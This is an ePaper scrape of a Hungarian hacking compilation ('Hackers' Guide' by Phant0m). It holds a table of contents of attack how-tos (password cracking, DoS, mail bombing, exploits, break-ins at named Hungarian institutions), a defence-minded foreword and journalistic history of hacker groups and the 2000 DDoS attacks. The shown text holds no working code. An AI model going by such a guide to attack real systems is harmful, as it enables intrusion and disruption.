14.12.2012 Views

Történet - juhorka1

Történet - juhorka1

Történet - juhorka1

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

Hackers’ Guide<br />

by Phant0m<br />

Volume #1


Hackers’ Guide<br />

Tartalom:<br />

Volume #1<br />

Előszó ..........................................................................................................................<br />

<strong>Történet</strong> .......................................................................................................................<br />

Hacker-ek, cracker-ek, phreak-ek<br />

Billentyűs betolakodók<br />

Alternatív kultúra: Hackerek<br />

Hackerek<br />

A törés művészete<br />

Mi az igazság<br />

Kevin D. Mitnick, a CyberKalóz<br />

Hacker találkozó Hollandiában<br />

A hacker kiáltványa<br />

Hacker-etika<br />

Fontosabb időpontok az Internet fejlődésében<br />

Hálózattörténelem<br />

A Byte magazin 98/4 -es számában megjelent cikke<br />

Kezdés .........................................................................................................................<br />

A Hacker és társai<br />

Első lépések…<br />

Ismertetô a hackelésrôl laikusoknak<br />

Kik a hackerek<br />

Mi is a cracker? Hogyan tevékenykedj illegálisan de biztonságban<br />

Hogyan lesz az emberből Hacker<br />

Használjatok PGP-t<br />

A titkosításról<br />

A paranoiáról<br />

Hack Windows alól és tudnivalók<br />

Az IP szerzés módszerei<br />

Social Engineering (társadalommérnökség)<br />

Trashing or dumpster diving (kukabúvárkodás)<br />

Backdoors<br />

Mi is az a trojai program<br />

Pár szó a trojai programokról<br />

Snifferek<br />

Keyloggerekről általában<br />

Mi az IP, TCP/IP<br />

A WORLD WIDE WEB<br />

File Transfer Protocoll (FTP)<br />

GOPHER<br />

MI A TELNET<br />

Socks4 Protokoll<br />

Betörések felfedezése és kezelése I.<br />

Betörések felfedezése és kezelése II.<br />

Betörések felfedezése és kezelése III.<br />

Betörések felfedezése és kezelése IV.<br />

Betörések felfedezése és kezelése V.<br />

2


Betörések felfedezése és kezelése VI.<br />

Hackers’ Guide<br />

Anonimitás ..................................................................................................................<br />

Névtelenség ...avagy "Mindenki minket figyel!"<br />

Hogyan maradjunk ismeretlenek?<br />

Egyedi azonosító?<br />

Proxy I.<br />

Proxy II.<br />

Proxy Hunter leírás<br />

Password .....................................................................................................................<br />

A jelszavakról általában<br />

A linux passwd file felépítése<br />

Jelszófeltörés<br />

Jelszavak törése<br />

Jelszótörés<br />

Passwd<br />

Re: Passwd<br />

PWL Hacking Tutorial<br />

Password fileok keresése<br />

Hogyan válasszunk rossz jelszót<br />

CuteFTP bizonytalan jelszótárolása<br />

BIOS Hátsóajtók<br />

BIOS jelszavak feltörése<br />

Denial of Service (DoS) ..............................................................................................<br />

Hogyan "lőjjünk" ki másokat a netről?<br />

És lőn sötétség a click után...<br />

A +++ath0 avagy a modemblitz<br />

NewTear<br />

DoS Tamadasok fajtai<br />

Internetto chat szivatás<br />

NUKING IS LAMEEE....<br />

Win98 TCP/IP bug<br />

D.o.S-ra alkalmas bug a W'2000-ben<br />

Pirch'98 ident/fserve daemon DoS támadás<br />

War FTP DoS (MKD/CWD)<br />

Email ............................................................................................................................<br />

Fake Email<br />

Hogyan küldjünk álcázott leveleket? (fakemail)<br />

Spoofed mail bombing by ReWtEr<br />

Levélbomba<br />

"Végtelenített" E-MAIL<br />

A legegyszerubb módszer levélbombázáshoz<br />

A Freemailrol ugy altalaban<br />

Szex kepek e-mailre<br />

Levélbomba törlése<br />

Outlook Express levelek<br />

Outlook Express 5 bug<br />

3


Hackers’ Guide<br />

WinPopup és NetSend üzenetek álcázása<br />

Volume #2<br />

Linux ............................................................................................................................<br />

Alap hack modszerek teoretikai oldala...<br />

Linux workstation törés<br />

Linux szerver törés<br />

Linux törés<br />

Egy lehetséges támadásra példa<br />

Backdoorokról gyakorlatban<br />

Unix Rendszerek Biztonsági Lyukai<br />

Root jog szerezése, ha alap felhasználo vagy<br />

Linux szerverek biztonsági kérdései<br />

Unix parancsok, amelyeket ismerned kell<br />

IP Chains kiegészítés<br />

Linux ipchains Firewall hiba<br />

Fakeuser<br />

Exploitok és a Telnet<br />

FTPCOVERSION bug<br />

Kernel bug<br />

WuFtpd trükk<br />

PING -R : kernel panic<br />

Hálozati Programozás C nyelven<br />

SAINT<br />

Windows ......................................................................................................................<br />

Back Orifice<br />

NetBus 1.70 Leírás<br />

Trójai programok felderítése WIN95/98 alatt I.<br />

Trójai programok felderítése WIN95/98 alatt II.<br />

Trójai programok felderítése WIN95/98 alatt III.<br />

Szempontok Windows trojan készítéséhez<br />

Kevésbé ismert Windows'9x biztonsági lyukak<br />

Jelszó eltüntetése Windowsrol<br />

Registryben tárolt jelszavakról<br />

Windows ScreenSaver Jelszó<br />

NT Password Cracker<br />

Windows NT munkaállomás törése<br />

Windows NT szerver törése<br />

Windows NT bug<br />

Re: Windows NT bug<br />

Hogyan fagyasszunk Win-es gépet intraneten<br />

Windows nyomtatómegosztás - bug<br />

Hogyan szerezzünk IP-t OP jog nélkül<br />

IIS 4.0 Microsoft Server Remote Exploit<br />

NT támadás<br />

FrontPage bug<br />

Minden az UNICODE bug-ról<br />

Internet Explorer tartalmi tanácsadó kikapcsolása<br />

4


Riched20.dll<br />

ActiveX I.<br />

ActiveX II.<br />

Hackers’ Guide<br />

Novell ...........................................................................................................................<br />

Novell jelszavak a Windows alatt<br />

Novell LAN Hacking<br />

Novell érdekességek<br />

Novell Groupwise bug<br />

IRC, ICQ .......................................................................................................................<br />

Két tűz mögött<br />

RFC-1459<br />

A mi mIRC-ünk... I. rész: Popups<br />

A mi mIRC-ünk... II. rész: Aliases<br />

A mi mIRC-ünk... III. rész: Remote<br />

A mi mIRC-ünk... IV. rész: Sockets<br />

A mi mIRC-ünk... V. rész: Dialogs<br />

A mi mIRC-ünk... VI. rész: Ami az eddigiekbôl kimaradt...<br />

Az IRC-harc alapjairól<br />

IRC Hacking Tutorial<br />

A null csatorna<br />

A #2,000 bug<br />

User klónozás<br />

Fake OP<br />

Fakedrop<br />

Flood<br />

mIRC flood védelem<br />

mIRC jelszó kikapcsolása<br />

mIRC 5.4 Kill<br />

mIRCkill patch<br />

Hogyan juss be egy csatira vagy szerverre, ha bannoltak?<br />

Az "eredeti név"-ben vezérlôjelek használata<br />

Az Eggdrop IRC bot<br />

Eggdrop 1.3.26 bug<br />

CTCP trükk<br />

DCC gyorsítás<br />

Hogyan tevékenykedj (írj, csatlakozz csatira, stb.) más nevében?<br />

Hogyan rejtsem el az IP címemet IRC-n?<br />

WAC - WoRsITE A CoToCoP<br />

Advanced On-JOIN scanner<br />

Miért ne irceljünk root-ként<br />

Hogyan pusztítsunk IRC-n vagy ICQ-n<br />

ICQ exploit - avagy hogyan klonozzunk ICQ-ban<br />

ICQ<br />

Re: ICQ99 jelszavak<br />

CTCP-FAQ<br />

Web ..............................................................................................................................<br />

A site feltörés<br />

5


Hackers’ Guide<br />

Web-Hack F.A.Q.<br />

Félhivatalos Web-Hack FAQ<br />

A PHF MODSZER<br />

Hogy kell Unix ACCot szerezni 24 oraval ezen dokumentum olvasasa utan ??<br />

Mi a .cgi<br />

.cgi Egyszeruen<br />

A test-cgi sebezhetősége bizonyos beállításoknál<br />

Néhány CGI bug csak röviden<br />

Két .cgi exploit<br />

"Vadász Gábor OnLine" jelszavak<br />

Jelszóvédett weblapok feltörése<br />

Webes levelbomba kuldes [ fLip! ]<br />

Altavista.Com ...avagy a hackerek legjobb buntársa<br />

Webterminál hackelések<br />

Extra hack<br />

Re: Extra hack<br />

Hogyan hackeljük meg az Extra.Hu-t<br />

Emil.alarmix.org hack<br />

A /wwwadmin.pl Exploitról<br />

Account Manager Password Exploit (amadmin.pl)<br />

Apexec.pl Bug<br />

Campas exploit<br />

Carbo.dll exploit<br />

Exploit a Microsoft IIS-hez<br />

HTML kód, ami leöli az IE 5-öt<br />

MailMachine.cgi bug<br />

QuikStore Shopping Cart Script bug<br />

Sambar Server bug<br />

Sambar Server search CGI bug<br />

Subscribe Me Exploit (subscribe.pl)<br />

Unstorekeeper.pl Bug<br />

.asp fájlok forráskódjának megtekintése<br />

Phreak .........................................................................................................................<br />

Kálváriám a Matávval: avagy ügyintézés RULEZ!!!!<br />

A 909 használata<br />

Mi az a wardialer<br />

Wardialer 1.31 by MMan<br />

THC-Scan használat + config<br />

Híváskorlátozásfeltörő 0.01 by Mman<br />

Ophacker 0.1 by MMan<br />

"06-80"-on keresztül külföldre<br />

A pénzbedobós telefonok hackolása Amerikában és Angliában<br />

Mobildolgok<br />

SMS Flood www.777sms.hu-n keresztül<br />

Szivatás mobiltelefonon keresztül<br />

Egy Matávos levele<br />

Volume #3<br />

6


Hackers’ Guide<br />

Egyéb ...........................................................................................................................<br />

Hogyan tudunk konnyen es egyszeruen bejutni egy SunOs?<br />

Hogyan irjunk at barmilyen filet AIX rendszerben 0-as UID nelkul ?<br />

OpenBSD felhasználói útmutató<br />

Különböző trójai programfajták leírása<br />

me$$iah trojai program<br />

RSC's Offline Server Emulator<br />

AMaViS root exploit<br />

CD-k másolásvédelmének megszüntetése<br />

amstel.interware.hu feltörése<br />

Nyugatmagyarországi Egyetem feltörése<br />

Országos Széchenyi Könyvtár feltörése<br />

Függelék ......................................................................................................................<br />

Internet kisszótár<br />

Linux Kisszótár<br />

IRC szótár<br />

Phreak szótár<br />

Szabványos portok listája<br />

Nemzetközi domain-ek<br />

A legismertebb trojai programok és portjaik I.<br />

A legismertebb trojai programok és portjaik II.<br />

BUHERÁTOR TESZT 1.1<br />

BugTraq lista részletek...<br />

Hasznos URL-ek gyüjteménye a számítógépes biztonság területén<br />

Előszó<br />

< !!! A HACKELÉST A TÖTVÉNY SZIGORÚAN BŰNTETI !!! ><br />

Akkor miért van ez a könyv? Azért, hogy fegyvert adjunk unatkozó gyerekeknek a<br />

kezébe? Tippeket adjunk hogyan törjenek be szerverekbe? Hogyan küldjenek<br />

levélbombát? Hogyan törjenek fel weblapokat?<br />

Korántsem!<br />

Azért van ez a könyv, hogy a naív és gyanútlan felhasználó és az elbizakodott<br />

rendszergazda megismerje azokat a technikákat, trükköket amivel többé-kevésbé<br />

könnyen be lehet jutni szerverekbe, hálózatokba. Hogy rámutassunk a redszerek<br />

gyenge pontjaira. Hogy igenis szükség van egy bizonyos „paranoiára” mert lehet,<br />

hogy holnap a Te gépedbe törnek be. Hogyan akarsz védekezni, ha nem tudod<br />

hogyan támadnak?<br />

7


Hackers’ Guide<br />

Ez a könyv az Interneten fellelhető magyar nyelvű hacker dokumentumok és írások<br />

összessége mindennemű tartalmi változtatás nélkül. Ahol megvolt, ott fel van<br />

tüntetve a szerző is. E könyv tartalma állandóan változik, bővül ahogy változnak a<br />

hackelés technikái is.<br />

by Phant0m<br />

************************************************************************************************<br />

Hacker-ek, cracker-ek, phreak-ek<br />

<strong>Történet</strong><br />

Az Egyesült Államokban és Nyugat-Európában 15-25 éves fiatalokból WEB-szerte<br />

ismert csoportok szervezodnek. A Legion of Doom (LoD), Masters of Deception<br />

(MoD), Cult of the Dead Cow (cDc), vagy a holland Hack-tic csak néhány, a<br />

legismertebbek közül. Tagjaik, különbözo dologra szakosodtak.<br />

A phreakek a telefonközpontok vezérloszámítógépeinek, a távközlési vonalak<br />

ingyenes igénybevételének és általában a telekommunikációnak a szakértoi.<br />

Rendelkeznek a központok átprogramozásához szükséges tudással, illetve<br />

megfelelo eszközökkel a mobil telefon hálózat forgalmának, belso adatainak<br />

lehallgatásához. Késobb ok maguk, vagy akiknek az információkat továbbadták<br />

mások költségére telefonálnak. A 95-ös adatok szerint, az összesített kár több mint 4<br />

milliárd USD. (Forrás: NCSA)<br />

A crackerek különbözo operációs rendszerekre és platformokra specializálódtak.<br />

Próbálgatnak, kisérleteznek amig valami "használhatóra" nem bukkannak. Elso<br />

lépésben a cél interaktív kapcsolat (login) megszerzése, ami kemény munkával<br />

továbbfejlesztheto root avagy superuser jogkörré, aki egy-egy gép legfobb<br />

adminisztrátora. A kis közöségeket az érdeklodés nagyobb közösségekké formálja,<br />

mert a tudás, tapasztalat így sokkal jobban átadható. Az ezirányú kutatással és<br />

információgyujtéssel is foglalkozó NCSA (National Computer Security Association)<br />

például csak az USA-ban egy olyan, több mint 400 BBS-bol álló hálózatot tart<br />

nyilván, amelyet ilyen közösségek tartanak fenn, szigorúan "belso" használatra - a<br />

telefontársaságok költségére. A tagok között munkamegosztás van. Egyesek<br />

felderítéssel foglalkoznak. Kukákban turkálnak, vállalatok papírhulladékai között<br />

keresgélnek, hátha login nevekre, jelszavakra bukkannak. Mások un. "WAR dialer"-t<br />

muködtetnek, ami éjszakánként több ezer számot is végigtárcsáz, hátha modemre<br />

bukkan a túlsó végen. A talált számok listája mint potenciális célpont felkerül a BBS<br />

hálózatra, hogy a többiek "hasznosítsák". Mások a postai hálózatok muködését<br />

tanulmányozzák, és pontos muszaki leírásokat adnak, hogyan lehet mindenféle<br />

"színes doboz"-t készíteni (blue box, red box ...stb.) a telefontársaságok kijátszására.<br />

8


Hackers’ Guide<br />

A blue box például a telefonközpontok közötti 2600 Hz-es un. in-band jelzéseket<br />

felhasználva ingyenes távhívásra "jogosít". Minden információt közzétesznek,<br />

megjelentetnek BBS-en, WWW szervereken, az általuk (is) látogatott NEWS groupok<br />

listáin, (ilyen pl. az alt. 2600 - a név a Blue box muködési frekvenciájából<br />

származik) és idoszakos kiadványokban. ( 2600 Magazine, Phreaker, Hacker.FAQ ).<br />

Az Interneten bárki szabadon hozzájuthat hacker tool-okhoz (pl. jelszó feltöro<br />

programokhoz) és a használatukhoz szükséges tudáshoz.<br />

Több-kevesebb rendszerességgel konferenciákat is szerveznek (DefCon, HoHoCon,<br />

H.O.P.E.-Hackers on Planeth Earth), ahol végre személyesen is talkálkozhatnak.<br />

Tapasztalatokat cserélnek, meghívott profiktól (ügyvédek, volt rendörök) eloadásokat<br />

hallgatnak jogaikról, védekezési lehetoségeikrol (letartóztatás-elkerülési technikák)<br />

és a rendorségi akciókról. Saját pólót nyomtatnak az esemény alkalmából.<br />

Jellegzetes pólófeliratok az alábbiak: "Root is a state of mind". Root-nak lenni (a<br />

UNIX-os gépek korlátlan hatalmú adminisztrátora) egy szellemi állapot. Vagy: "Why?<br />

Because We Can!" Hogy miért tesszük? Mert képesek vagyunk rá!<br />

Azt állítják (minden bizonnyal joggal), hogy ok csupán összegyujtik, rendezik és úgy<br />

publikálják a legtöbbször amúgy is nyilvános információkat. Szabad<br />

információáramlást kibertérben! Ez filozófiájuk egyik alapköve. Minden<br />

tevékenységük ezt szolgálja - legalábbis elvben. A másik alapko az érdeklodés. Az<br />

lehet igazi hacker akit a tudás magáért a tudásért érdekel. Az anyagi elonyökért<br />

elkövetett betörések elég ritkák. A motiváció inkább a hiúság, csínyben való<br />

részvétel, hírnév. Nemegy esetben sztárt csinált a börtönviselt crackerbol az<br />

amerikai média.<br />

A bunüldözo szervek (FBI, Secret Service High-tech Crime Division) természetesen<br />

tudnak a konferenciákról, és képviseltetik is magukat, amire a résztvevok a "Spot the<br />

FEDs" (szúrd ki az ügynököt) vetélkedovel válaszolnak. Ez már hagyomány.<br />

Komolyabb rendorségi akciókra csak akkor kerül sor, ha mondjuk kiderül, hogy valaki<br />

törölte a hotel számítógépébol a vendéglistát. Ezen persze amúgy is csak<br />

fantázianevek fordulnak elo.: Eric Blodaxe (LoD), Deth Vegetable (cDc), Optic (MoD)<br />

estleg Corrupt. Az itt egymásnak elmesélt történetek között a mulatságostól az<br />

ijesztoig minden található. Musoron vannak az osellenség a "hárombetus"<br />

kormányügynökségek gépeire való sikeres betörések. Az ügynökségek ezek létét<br />

tagadják. Hitelesen cáfolni nehéz, bizonyítani veszélyes. Biztosan megesett viszont,<br />

hogy a NASA egyik központjának klímaberendezését vezérlo számítógépbe sikerült<br />

modemes kapcsolaton behatolni. A többit az olvasók fantáziájára bízom...<br />

A témával foglalkozó ujságírók sincsenek biztonságban. 1994-ben a Slatalla-Quittner<br />

szerzopáros hosszabb cikket jelentetett meg a MoD és az LoD közötti egyik<br />

nézeteltérésrol egy amerikai lapban, "Gang War in Cyberspace" címmel. A "fiúk"<br />

zokon vették a dolgot. Eloször is átprogramozták a vevoket kiszolgáló<br />

telefonközpontot, mintha az elofizeto azt kérné (természetesen saját költségére),<br />

hogy a bejövo hívások egy másik (távolsági hívással elérheto) helyen csöngjenek ki.<br />

Ott (nem túl illedelmes bevezeto után) egy üzenetrögzíto fogadta a hívást. A szerzok<br />

döbbenetére se fonökeiknek se rokonaiknak nem tunt fel a dolog, szépen üzenetet<br />

hagytak. A bosszú folytatásaként két kisebb Internet szolgáltató (elozoleg feltört)<br />

gépérol levélbombázást indítottak a szerzok Internetre kapcsolt gépe ellen, úgyhogy<br />

azt ideiglenesen le kellett állítani.<br />

9


Hackers’ Guide<br />

A példák sora hosszan, hosszan folytatható. Az egész jelenséget két dolog teszi<br />

igazán ijesztové a kívülálló számára. Nem tudható, ki a következo célpont, és nem<br />

tudható, hogyan lehet védekezni a következo támadás ellen. A betörok nem ott<br />

törnek be ahol akarnak, de hogy hol, azt sem a biztonsági rendszereket tervezo<br />

szakértok, de talán maguk a betörok sem tudják elore megmondani. Az elony a<br />

betörok oldalán van. Nekik korlátlan idejük van, míg a védelem költségvetése mindig<br />

véges.<br />

Az egyik számítógépes biztonságról szóló könyvben az alábbiak olvashatók:<br />

"Ha mély benyomást akarsz tenni egy biztonsági szakértore, mondd azt, hogy az<br />

elmúlt 5 évben csak egyszer törtek be a rendszeredbe. Ha ugyanis azt mondod,<br />

hogy egyszer sem, akkor azt fogja hinni, még arra is képtelen vagy, hogy észleld a<br />

betöréseket."<br />

Hogyan lehet védekezni?<br />

Az amerikai hatóságok '91-ben az egész USA-ra kiterjedo hajtóvadászatot indítottak<br />

aminek 14 letartóztatás majd 4 személy börtönbüntetése lett az eredménye. Az<br />

események hu krónikája a WEB-en is olvasható, könyv formában kiadott "Hackers<br />

Crackdown". A hatóságok akciói, és egyáltalán a kérdéskör jogi kezelése (nem<br />

beszélve arról, hogy a jog, mint mindig, messze elmarad a technika mögött) POST<br />

MORTEM, vagyis a kárvallottakon már nem sokat segít. Az Elektronikus<br />

Határvidéken - akárcsak egykor a vadnyugaton - mindenki a maga igazát védi,<br />

ahogyan tudja. Néha igencsak vadregényes módszerekkel. A már említett NCSA pl.<br />

un. Tiger Team-et tart fenn, melynek feladata, hogy a megbízó cégek hálózataiba<br />

bármilyen hacker módszerrel betörjön, így kimutatva a védelem gyenge pontjait. A<br />

hatékonyabb munka érdekében a MasterCard támogatásával beépültek Cracker<br />

közöségbe. Érvényes, áldozatnak szánt hitelkártya számokat közöltek a<br />

crackerekkel, cserébe hozzáférést nyertek a már említett, több mint 400 gépes BBS<br />

hálózat anyagához. Ezt az NCSA éjszakánként gondosan végigindexeli, hogy<br />

könnyebb legyen téma szerint keresni a védelmi rendszerek tervezésekor. WWW<br />

szerverükön a társaság tagjai rengeteg hasznos információt találhatnak.<br />

Coverrid<br />

************************************************************************************************<br />

Billentyűs betolakodók<br />

Internetes bűnözés<br />

Előbb a Yahoo!, aztán az EBay. A világháló sebezhetősége komoly veszélyt<br />

jelent az elektronikus kereskedelemre - és mindannyiunkra.<br />

Bekövetkezett az, amire számítógépes biztonsági szakértők még gondolni sem<br />

mertek: egymás után, dominóként dőltek össze a világháló legnagyobb elektronikus<br />

kereskedelmi fórumai. A Yahoo!-val kezdődött. Február 6-án az óriásportál három<br />

10


Hackers’ Guide<br />

órára leállt. A következő napon - mindössze órákkal tőzsdei bevezetése után - a<br />

kiskereskedelemben utazó Buy.com társaságot érte utol a végzet. Aztán este sor<br />

került az eBay, az Amazon.com és a CNN honlapjaira is. A következő reggelen a<br />

káosz tovább gyűrűzött az E*Trade online brókercég és mások felé: internetes lapjaik<br />

forgalma gyakorlatilag megbénult.<br />

Mindez talán egyetlen szuper-hacker műve volt? Az ügyet vizsgáló nyomozók<br />

egyelőre nem tudják - vagy nem árulják el. De a szakembereket a felelős személy<br />

vagy csoport kiléténél jobban aggasztja, milyen könnyedséggel hangolták össze és<br />

vezényelték le a támadássorozatot. Minden jel arra utal, hogy valaki otthona<br />

melegében üldögélve, néhány billentyű lenyomásával súlyos zavart kelthet az egész<br />

világ elektronikus kereskedelemben.<br />

SAKK ÉS MATT<br />

A szakemberek szerint az egész annyira egyszerű, hogy az már ijesztő: a pusztítást<br />

végző szoftver használata könnyű, a világháló számtalan underground hacker<br />

oldaláról gond nélkül letölthető. A rövidke programot azután számítógépek<br />

garmadájára csempészik fel a világ minden pontján.. Aztán csak egy gombnyomás<br />

és az összes ilyen PC akcióba lép: újra és újra egy egyszerű információkérést<br />

küldenek a kiszemelt honlapnak - másodpercenként több százszor. Hiába minden<br />

bonyolult tűzfal, behatolást érzékelő rendszer, titkosítás és biztonsági előírás, az<br />

elektronikus boltok egy-kettőre áldozatául esnek ennek a viszonylag egyszerű<br />

eljárásnak. Olyan ez,mint amikor többen egyszerre tárcsázzák ugyanazt a<br />

telefonszámot, s mindannyian foglalt jelzést hallanak. "Ilyen nagyságrendben ilyesmit<br />

eddig még nem tapasztaltunk, nemcsak az EBay-nél, de máshol sem" - állítja<br />

Margaret C. Whitman, a társaság vezérigazgatója.<br />

A támadók sem a website-ot nem törték fel, sem adatokat nem tettek tönkre, sem<br />

hitelkártyaszámokat nem loptak - legalábbis ez idáig. Ám ezzel a pokolian egyszerű<br />

trükkel mégis sikerült átmenetileg megbénítani a kereskedelmet a világháló<br />

legnagyobbjai közé tartozó több portálon, nekünk szegezve a kérdést: Mennyire<br />

sebezhető az internet? Veszélyeztethetik az ehhez hasonló akciók az idén várhatóan<br />

450 milliárd dollár kereskedelmi forgalmat lebonyolító világháló robbanásszerű<br />

növekedését? "Odakint már egy ideje háború folyik, legfeljebb eddig rejtve maradt" -<br />

mondja James Adams, a cyber-fenyegetésekre specializálódott Virginia állambeli<br />

iDEFENSE egyik alapítója. "Most ébredtek rá széles körben az emberek a háló<br />

sebezhetőségére, és arra, hogy mibe is keveredtünk, amikor gondolkodás nélkül<br />

beneveztünk az információs szupersztráda gyorsasági versenyébe."<br />

Persze még a legdörzsöltebb "cyberkopók" sem állítják, hogy a net egyik napról a<br />

másikra hervadásnak indulna az ilyen kalózakciók miatt. De az elmúlt napok<br />

eseményei után a napnál is világosabb: az internetes vállalatoknak legalább annyi<br />

gondot kell fordítaniuk honlapjaik és hálózataik védelmére, mint arra, hogy azokat<br />

összekössék vásárlóikkal, beszállítóikkal - és velünk. Emléketetőül csak a közelmúlt<br />

történéseinek hevenyészett listája:<br />

- Decemberben 300 ezer hitelkártyaszámot loptak el az online<br />

zenekereskedést folytató CD Universe-től.<br />

- Márciusban az elektronikus levelező rendszereken végigsöprő, s azokat<br />

11


Hackers’ Guide<br />

világszerte megbénító Melissa vírus mintegy 80 millió dolláros kárt okozott.<br />

- Ugyanabban a hónapban a felbérelt hackerek beismerték, hogy feltörték az<br />

AT&T, a GTE és a Sprint távközlési óriások rendszereit, többek között olyan<br />

hívókártya számokért, amelyek végül olasz szervezett bűnbandák kezébe<br />

kerültek. Az FBI a telefontársaságoknak okozott kárt 2 millió dollárra becsülte.<br />

A szélessávú Internet-kapcsolatok mindennapossá válásával még súlyosabbá válhat<br />

helyzet. Egyre többen vannak, akik a világhálót többé nem alkalmanként,<br />

tárcsázással érik el a világhálót, hanem a telefonhoz hasonlóan állandó kapcsolatban<br />

lesznek a hálózattal. Meglehet, ez zene az elektronikus kereskedők füleinek, viszont<br />

a vásárlókra valódi veszélyt az jelenthet, ha a cybercsalók úgy járhatnak ki-be<br />

számítógépes rendszerünkben, ahogy kedvük tartja. "Addig kopogtatnak, míg nyitott<br />

ajtót nem találnak." - mondja Bruce Schneyder biztonságtechnikai szakértő.<br />

A legnagyobb fenyegetés - bármilyen elkeserítő is - belülről jön. A nyomozó<br />

hatóságok becslései szerint a betörések mintegy 60 százalékát belső alkalmazottak<br />

követik el.<br />

A számítógépes hálózatok könnyen hozzáférhető belépési pontok a bosszúszomjas<br />

alkalmazottak, kémek, tolvajok, "szociopaták" és unatkozó tinédzserek számára. Ha<br />

már egyszer bejutottak a vállalat belső hálózatába, szabadon garázdálkodhatnak az<br />

ott található szellemi tulajdonnal vagy adatokkal, munkafolyamatokat<br />

akadályozhatnak, vagy akár teljesen tönkretehetnek egy adott üzletet vagy karriert.<br />

"Ez én felfogásom szerint minden internetes tranzakció potenciális célpont" - vallja<br />

Paul Field, a számítógépes kalózból lett biztonsági tanácsadó.<br />

Egy kis felfordulást szeretne kelteni? Biztonsági szakértők szerint mintegy 1900<br />

website-ról tölthetőek le - ingyen - azok a digitális eszközök, amelyek segítségével<br />

bárki szimatolhat mások gépén, azt lefagyaszthatja, átveheti felette az irányítást,<br />

vagy megszerezheti minden egyes billentyűleütés másolatát. Steve O'Brien, az<br />

illetéktelen behatolások felderítésével és biztonsági megoldásokkal foglalkozó,<br />

marylandi székhelyű cég, az Info-Ops.com információs műveletekért felelős alelnöke<br />

szerint a számítógépek feltörésének módozatai napról napra fejlődnek. A növekvő<br />

veszélyért O'Brien nemcsak a hacker-csoportokat, de a programok megállíthatatlan<br />

terjedését is okolja. Ami egykor ritkaságnak számított - ma naponta legalább három<br />

új rosszindulatú szoftvert vagy sebezhető programpontot fedeznek fel.<br />

Billentyűs betolakodók 2<br />

Kitárt kapuk<br />

Mindez széles támadási felületet biztosít a hackereknek. Egy hagyományos<br />

telefonos modemmel összekötött személyi számítógép a felhasználó minden egyes<br />

hálóra kapcsolódásakor új internetes (IP) címet kap. Ez komoly gát az adott gépet az<br />

eBay-t, a Yahoo!-t és másokat ért támadáshoz hasonló eszközökkel feltörni és<br />

"eltéríteni" igyekvő kalózok előtt. Ezzel ellentétben a kábeles és digitális előfizetői<br />

vonalak igen csábítóak a hackerek számára, mivel ezek a gépek folyamatos<br />

12


Hackers’ Guide<br />

kapcsolatban vannak a világhálóval, s általában fix, az e-mailekből és a hírfórumokra<br />

küldött levelekből könnyen kiolvasható címmel rendelkeznek. A gépeket megvédeni<br />

képes "tűzfal" néven ismert biztonsági rendszerek minden otthoni kábeles és digitális<br />

előfizető számára is elérhetőek. De amíg ezek használata nem közelíti meg a 100<br />

százalékot, nem akadályozhatják meg a betöréseket.<br />

Az információs háztartási eszközök korának felvirradtával a helyzet tovább romolhat.<br />

Számos elemző szerint az Egyesült Államokat már a közeljövőben eláraszthatják a<br />

webböngészős televíziók, a hálózatos játékvezérlők, az intelligens hűtőszekrények<br />

és a hálóról programokat letöltő webtelefonok. Ezekben az eszközökben erős, az<br />

internettel kapcsolatban álló processzorok dolgoznak, amelyeket egy támadás során<br />

ki lehet használni.<br />

Nem mintha a szélessávú internet felhasználói nem kapcsolódhatnának le a<br />

világhálóról. De ahogy egyre több izgalmas lehetőség tárul fel, senkinek sem lesz<br />

már ehhez kedve. Folyamatos zene- és videoszolgáltatás, napi 24 órás hírszolgálat<br />

és a szélessávú webes integráció sok más fajtája jelenik majd meg. Hogy<br />

kihasználják ezek előnyeit, az emberek éjjel-nappal nyitva tartják majd az "ajtókat".<br />

Semmivel sem rózsásabb a helyzet a vállalatoknál. A rendszerbiztonság náluk jó<br />

úton tart afelé, hogy alapvető és drága szükségletté váljon. Az amerikai vállalati<br />

szféra tavaly 4,4 milliárd dollárt költött internetes biztonsági programokra, így<br />

"tűzfalakra", behatolásjelző szoftverekre, digitális tanúsítványokra, valamint hitelesítő<br />

és engedélyeztető programokra. E kiadások 2003-ra elérhetik a 8,3 milliárd dollárt.<br />

TERJEDŐBEN<br />

A számítógépes bűnözés mégis terjed. Az FBI és a Computer Security Institute 520<br />

vállalatot és intézetet felölelő felmérése során a válaszadók több mint 66 százaléka<br />

számolt be számítógépes hálózata illetéktelen használatáról a kérdezést megelőző<br />

12 hónap során. 1997-ben ez még csak 50 százalék volt. És a behatolásoknak<br />

immár 57 százaléka volt összefüggésbe hozható az internettel, a két évvel korábbi<br />

45 százalékkal szemben.<br />

Bármilyen nagynak is tűnnek ezek a számok, igazából senki sem tudja, hogy<br />

menynyire elterjedt az internetes bűnözés. A legtöbb támadás - biztonsági szakértők<br />

szerint akár 60 százalékuk is - észrevétlen marad. Ám még az észlelt támadásoknak<br />

is csupán legfeljebb 15 százalékát jelentik a bűnüldöző hatóságoknak. A vállalatok<br />

kerülik a nyilvánosságot. Amikor az orosz alvilág hackerek segítségével betört a<br />

Citibankba és onnan leemelt 10 millió dollárt - csak 400 ezret sikerült belőle<br />

visszaszerezni - a konkurencia a hírt reklámkampányaiban a bank ellen fordította.<br />

Ez tovább nehezíti a hatóságok munkáját. Az elektronikus támadást elszenvedő<br />

vállalatok túlnyomó része nem nyilatkozik a sajtónak. Leginkább vevőik bizalmának<br />

elvesztésétől és imidzsük sérülésétől tartanak - nem beszélve a támadást majmoló<br />

hackerektől való félelemről. A február 8-i és 9-i támadásokat követően az általában<br />

bőbeszédű internetes cégvezetők, az E*Trade-től a Priceline.com-ig, árulkodó<br />

hallgatásba burkolóztak. Azok, akiket még nem ért támadás, vonakodtak<br />

megszólalni, nehogy ezzel hívják fel site-jukra a figyelmet. A többieknek pedig már<br />

elegük volt a nyilvánosságból.<br />

13


Hackers’ Guide<br />

HONLAPELTÉRÍTÉS<br />

A bűnüldözők egyik problémája, hogy a hackerek látszólag mindenütt jelen vannak.<br />

Előfordul, hogy úgynevezett számítógépes biztonsági cégeknél dolgoznak. Egyre<br />

gyakoribbak a külföldről, különösen a Kelet-Európából induló támadások. A probléma<br />

súlyosságát jelzi, hogy az America Online 1996-ban a saját biztonsága érdekében<br />

inkább megszakította összeköttetését Oroszországgal. És ha a kalózok miatti<br />

aggódás nem volna elég, az online csalások száma is emelkedőben van. A<br />

fogyasztók által bejelentett, hamis meggazdagodási lehetőségekkel kecsegtető<br />

